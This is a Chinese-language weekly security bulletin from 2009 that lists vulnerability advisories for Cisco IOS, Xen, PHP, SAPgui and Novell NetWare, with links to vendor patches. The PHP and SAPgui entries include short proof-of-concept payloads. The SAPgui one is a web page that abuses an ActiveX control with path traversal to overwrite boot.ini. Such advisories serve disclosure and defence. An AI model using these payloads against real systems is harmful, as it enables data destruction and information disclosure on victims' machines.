当前位置: 安全纵横 > 安全公告

一周业界安全动态(9月28日-10月4日)

来源:安恒信息 日期:2009-10

Cisco IOS SIP消息拒绝服务漏洞

受影响系统:
Cisco IOS 12.4
Cisco IOS 12.3
描述:
Cisco IOS是思科网络设备所使用的互联网操作系统。
如果设备运行的Cisco IOS镜像中包含有Cisco Unified Border Element功能,则Cisco IOS软件的SIP实现中存在拒绝服务漏洞。处理一系列特制的SIP消息会导致设备重载。
厂商补丁:
Cisco已经为此发布了一个安全公告(cisco-sa-20090923-sip)以及相应补丁:
cisco-sa-20090923-sip:Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability
链接:http://www.cisco.com/warp/public/707/cisco-sa-20090923-sip.shtml 

 

Xen pygrub本地验证绕过漏洞
受影响系统:
XenSource Xen 3.3.1
XenSource Xen 3.3
XenSource Xen 3.0.3
描述:
Xen是一款用于Linux内核的一种虚拟化技术,允许同时运行多个操作系统。
Xen's PyGrub,当grub.conf以密码保护配置的情况下,在主机启动阶段没有检查密码,可物理接触主机的攻击者,可以利用这个缺陷更改OS启动配置。
厂商补丁:
用户可参考如下安全公告获得补丁信息:
https://bugzilla.redhat.com/show_bug.cgi?id=525740

 

PHP mysqli_real_escape_string()函数信息泄露漏洞
受影响系统:
PHP <= 5.3
描述:
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP所使用的mysqli_real_escape_string())函数从用户输入字符串获得参数,如果所传送的值为数组而不是字符串就会生成警告,警告消息中包含有当前运行脚本的完整路径。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Proof of concept:
http://localhost/cms/sqlfilter/sqlsanatizer.php?params[]=

Warning: mysqli_real_escape_string() expects parameter 1 to be string,
array given in /var/www/vhosts/cms/sqlfilter/sqlsanatizer.php
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.php.net

 

SAPgui WebViewer2D.dll ActiveX控件任意文件覆盖漏洞
受影响系统:
SAP Sapgui 7.1
SAP Sapgui 6.4
描述:
SAPgui是SAP软件的图形用户界面客户端。
SAP GUI所捆绑的EAI WebViewer2D ActiveX组件(WebViewer2D.dll,GUID = {A76CEBEE-7364-11D2-AA6B-00E02924C34E})没有正确地验证用户对SaveToSessionFile函数所传送的参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能覆盖任意系统文件。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<HTML>
<BODY>
<object id=ctrl classid="clsid:{A76CEBEE-7364-11D2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
{
File = "../../../../../../../../../../../../boot.ini"
ctrl.SaveToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sap.com/

 

Novell NetWare CALLIT调用栈溢出漏洞
受影响系统:
Novell Netware 6.5
描述:
Novell Netware是一款商业性质的网络操作系统。
Netware的NFS端口映射器守护程序(PKERNEL.NLM)在处理CALLIT RPC调用时错误的信任了长度字段,远程攻击者可以通过提交超长的RPC请求触发栈溢出,导致执行任意代码。
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://download.novell.com/Download?buildid=DNxmXuyVPuY~